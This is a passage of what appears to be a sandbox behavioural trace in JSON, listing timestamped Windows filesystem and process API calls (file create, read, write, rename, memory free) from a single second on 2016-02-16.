"2016-02-16 17:41:53,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,449", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,459", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": 